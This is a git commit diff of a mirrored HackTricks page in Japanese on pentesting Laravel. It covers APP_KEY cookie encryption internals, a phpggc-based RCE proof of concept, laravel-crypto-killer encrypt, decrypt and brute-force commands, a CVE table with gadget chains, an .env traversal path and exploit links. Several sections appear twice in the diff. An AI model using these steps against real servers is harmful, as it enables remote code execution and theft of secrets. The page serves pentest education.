mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/network-services-pentesting/pentesting-web/laravel.md']
This commit is contained in:
Translator
parent
3a24269f55
commit
5973bf6419
@ -1,14 +1,98 @@
|
||||
# Laravel
|
||||
|
||||
{{#include /banners/hacktricks-training.md}}
|
||||
|
||||
### Laravel SQLInjection
|
||||
|
||||
ここで情報を読む: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
|
||||
|
||||
---
|
||||
|
||||
## APP_KEY & Encryption internals (Laravel \u003e=5.6)
|
||||
|
||||
Laravelは、内部でAES-256-CBC(またはGCM)をHMAC整合性と共に使用しています(`Illuminate\\Encryption\\Encrypter`)。
|
||||
最終的に**クライアントに送信される**生の暗号文は、次のような**JSONオブジェクトのBase64**です:
|
||||
```json
|
||||
{
|
||||
"iv" : "Base64(random 16-byte IV)",
|
||||
"value": "Base64(ciphertext)",
|
||||
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
|
||||
"tag" : "" // only used for AEAD ciphers (GCM)
|
||||
}
|
||||
```
|
||||
`encrypt($value, $serialize=true)` はデフォルトでプレーンテキストを `serialize()` し、`decrypt($payload, $unserialize=true)` **は自動的に `unserialize()`** された値を復号化します。したがって、**32バイトの秘密 `APP_KEY` を知っている攻撃者は、暗号化されたPHPシリアライズオブジェクトを作成し、マジックメソッド(`__wakeup`、`__destruct`、…)を介してRCEを得ることができます**。
|
||||
|
||||
最小限のPoC(フレームワーク ≥9.x):
|
||||
```php
|
||||
use Illuminate\Support\Facades\Crypt;
|
||||
|
||||
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
|
||||
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
|
||||
```
|
||||
生成された文字列を任意の脆弱な `decrypt()` シンク(ルートパラメータ、クッキー、セッションなど)に注入します。
|
||||
|
||||
---
|
||||
|
||||
## laravel-crypto-killer 🧨
|
||||
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) は、全プロセスを自動化し、便利な **bruteforce** モードを追加します:
|
||||
```bash
|
||||
# Encrypt a phpggc chain with a known APP_KEY
|
||||
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
|
||||
|
||||
# Decrypt a captured cookie / token
|
||||
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
|
||||
|
||||
# Try a word-list of keys against a token (offline)
|
||||
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
|
||||
```
|
||||
スクリプトはCBCおよびGCMペイロードの両方を透過的にサポートし、HMAC/tagフィールドを再生成します。
|
||||
|
||||
---
|
||||
|
||||
## 実世界の脆弱なパターン
|
||||
|
||||
| プロジェクト | 脆弱なシンク | ガジェットチェーン |
|
||||
|--------------|--------------|-------------------|
|
||||
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
|
||||
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN`クッキーが`Passport::withCookieSerialization()`が有効な場合 | Laravel/RCE9 |
|
||||
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session`クッキー | Laravel/RCE15 |
|
||||
|
||||
エクスプロイトのワークフローは常に次の通りです:
|
||||
1. `APP_KEY`を取得する(デフォルトの例、Gitリーク、config/.envリーク、またはブルートフォース)
|
||||
2. **PHPGGC**でガジェットを生成する
|
||||
3. `laravel_crypto_killer.py encrypt …`
|
||||
4. 脆弱なパラメータ/クッキーを通じてペイロードを配信 → **RCE**
|
||||
|
||||
---
|
||||
|
||||
## クッキーのブルートフォースによる大量APP_KEY発見
|
||||
|
||||
新しいLaravelのレスポンスは少なくとも1つの暗号化されたクッキー(`XSRF-TOKEN`および通常は`laravel_session`)を設定するため、**公共のインターネットスキャナー(Shodan、Censysなど)は数百万の暗号文を漏洩**し、オフラインで攻撃可能です。
|
||||
|
||||
Synacktivによって発表された研究の主な発見(2024-2025):
|
||||
* データセット2024年7月 » 580kトークン、**3.99%のキーが解読**(≈23k)
|
||||
* データセット2025年5月 » 625kトークン、**3.56%のキーが解読**
|
||||
* >1,000サーバーがレガシーCVE-2018-15133に対して依然として脆弱で、トークンが直接シリアライズされたデータを含んでいます。
|
||||
* 大規模なキー再利用 – トップ10のAPP_KEYは商業用Laravelテンプレート(UltimatePOS、Invoice Ninja、XPanelなど)に付属するハードコーディングされたデフォルトです。
|
||||
|
||||
プライベートGoツール**nounours**はAES-CBC/GCMのブルートフォーススループットを約15億試行/秒に押し上げ、フルデータセットの解読を2分未満に短縮します。
|
||||
|
||||
---
|
||||
|
||||
## 参考文献
|
||||
* [Laravel: APP_KEY漏洩分析](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
|
||||
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
|
||||
* [PHPGGC – PHP一般的ガジェットチェーン](https://github.com/ambionics/phpggc)
|
||||
* [CVE-2018-15133の詳細(WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## Laravel Tricks
|
||||
## Laravelのトリック
|
||||
|
||||
### デバッグモード
|
||||
|
||||
Laravelが**デバッグモード**のとき、**コード**や**機密データ**にアクセスできます。\
|
||||
例えば `http://127.0.0.1:8000/profiles`:
|
||||
Laravelが**デバッグモード**にある場合、**コード**および**機密データ**にアクセスできます。\
|
||||
例えば`http://127.0.0.1:8000/profiles`:
|
||||
|
||||
.png>)
|
||||
|
||||
@ -16,11 +100,11 @@ Laravelが**デバッグモード**のとき、**コード**や**機密データ
|
||||
|
||||
### .env
|
||||
|
||||
Laravelは、クッキーやその他の資格情報を暗号化するために使用するAPPを`.env`というファイルに保存しており、パス・トラバーサルを使用してアクセスできます: `/../.env`
|
||||
Laravelはクッキーや他の資格情報を暗号化するために使用するAPPを`.env`というファイルに保存しており、次のパスを使ってアクセスできます:`/../.env`
|
||||
|
||||
Laravelは、エラーを見つけたときに表示されるデバッグページ内にもこの情報を表示します(デバッグが有効になっている場合)。
|
||||
Laravelはエラーを見つけたときにデバッグページ内にもこの情報を表示します(それが有効になっている場合)。
|
||||
|
||||
Laravelの秘密のAPP_KEYを使用して、クッキーを復号化し再暗号化できます。
|
||||
Laravelの秘密のAPP_KEYを使用して、クッキーを復号化し再暗号化できます:
|
||||
|
||||
### クッキーの復号化
|
||||
```python
|
||||
@ -87,16 +171,99 @@ encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2
|
||||
|
||||
ここでデシリアライズの脆弱性に関する情報を見つけることができます: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
|
||||
|
||||
[https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133) を使用してテストおよび悪用できます\
|
||||
[https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)を使用してテストおよび悪用できます。\
|
||||
または、metasploitを使用しても悪用できます: `use unix/http/laravel_token_unserialize_exec`
|
||||
|
||||
### CVE-2021-3129
|
||||
|
||||
別のデシリアライズ: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
|
||||
|
||||
### Laravel SQLインジェクション
|
||||
### Laravel SQLInjection
|
||||
|
||||
ここでの情報をお読みください: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
|
||||
|
||||
|
||||
### Laravel SQLInjection
|
||||
|
||||
ここでの情報をお読みください: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
|
||||
|
||||
---
|
||||
|
||||
## APP_KEY & 暗号化の内部 (Laravel \u003e=5.6)
|
||||
|
||||
Laravelは、内部でHMAC整合性を持つAES-256-CBC(またはGCM)を使用しています(`Illuminate\\Encryption\\Encrypter`)。
|
||||
最終的に**クライアントに送信される**生の暗号文は、**JSONオブジェクトのBase64**のようになります:
|
||||
```json
|
||||
{
|
||||
"iv" : "Base64(random 16-byte IV)",
|
||||
"value": "Base64(ciphertext)",
|
||||
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
|
||||
"tag" : "" // only used for AEAD ciphers (GCM)
|
||||
}
|
||||
```
|
||||
`encrypt($value, $serialize=true)` はデフォルトでプレーンテキストを `serialize()` し、`decrypt($payload, $unserialize=true)` **は自動的に `unserialize()`** された値を復号化します。したがって、**32バイトの秘密 `APP_KEY` を知っている攻撃者は、暗号化されたPHPシリアライズオブジェクトを作成し、マジックメソッド(`__wakeup`、`__destruct`、…)を介してRCEを得ることができます**。
|
||||
|
||||
最小限のPoC(フレームワーク ≥9.x):
|
||||
```php
|
||||
use Illuminate\Support\Facades\Crypt;
|
||||
|
||||
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
|
||||
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
|
||||
```
|
||||
生成された文字列を任意の脆弱な `decrypt()` シンク(ルートパラメータ、クッキー、セッションなど)に注入します。
|
||||
|
||||
---
|
||||
|
||||
## laravel-crypto-killer 🧨
|
||||
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) は、全プロセスを自動化し、便利な **bruteforce** モードを追加します:
|
||||
```bash
|
||||
# Encrypt a phpggc chain with a known APP_KEY
|
||||
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
|
||||
|
||||
# Decrypt a captured cookie / token
|
||||
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
|
||||
|
||||
# Try a word-list of keys against a token (offline)
|
||||
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
|
||||
```
|
||||
スクリプトはCBCおよびGCMペイロードの両方を透過的にサポートし、HMAC/タグフィールドを再生成します。
|
||||
|
||||
---
|
||||
|
||||
## 実世界の脆弱なパターン
|
||||
|
||||
| プロジェクト | 脆弱なシンク | ガジェットチェーン |
|
||||
|--------------|--------------|--------------------|
|
||||
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
|
||||
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` クッキーが `Passport::withCookieSerialization()` 有効な場合 | Laravel/RCE9 |
|
||||
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` クッキー | Laravel/RCE15 |
|
||||
|
||||
エクスプロイトのワークフローは常に次の通りです:
|
||||
1. `APP_KEY` を取得する(デフォルトの例、Gitリーク、config/.envリーク、またはブルートフォース)
|
||||
2. **PHPGGC** でガジェットを生成する
|
||||
3. `laravel_crypto_killer.py encrypt …`
|
||||
4. 脆弱なパラメータ/クッキーを通じてペイロードを配信 → **RCE**
|
||||
|
||||
---
|
||||
|
||||
## クッキーのブルートフォースによる大規模なAPP_KEY発見
|
||||
|
||||
新しいLaravelのレスポンスは少なくとも1つの暗号化されたクッキー(`XSRF-TOKEN` と通常は `laravel_session`)を設定するため、**公共のインターネットスキャナー(Shodan, Censys, …)は数百万の暗号文を漏洩させ**、オフラインで攻撃可能です。
|
||||
|
||||
Synacktivによって発表された研究の主な発見(2024-2025):
|
||||
* データセット 2024年7月 » 580 k トークン、**3.99 % のキーが解読されました** (≈23 k)
|
||||
* データセット 2025年5月 » 625 k トークン、**3.56 % のキーが解読されました**
|
||||
* >1,000 サーバーが依然としてレガシー CVE-2018-15133 に脆弱で、トークンが直接シリアライズされたデータを含んでいます。
|
||||
* 巨大なキーの再利用 – トップ10のAPP_KEYは商業用Laravelテンプレート(UltimatePOS, Invoice Ninja, XPanel, …)にハードコーディングされたデフォルトです。
|
||||
|
||||
プライベートGoツール **nounours** はAES-CBC/GCMのブルートフォーススループットを約15億試行/秒に押し上げ、フルデータセットの解読を2分未満に短縮します。
|
||||
|
||||
---
|
||||
|
||||
## 参考文献
|
||||
* [Laravel: APP_KEY漏洩分析](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
|
||||
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
|
||||
* [PHPGGC – PHP一般的ガジェットチェーン](https://github.com/ambionics/phpggc)
|
||||
* [CVE-2018-15133の詳細 (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user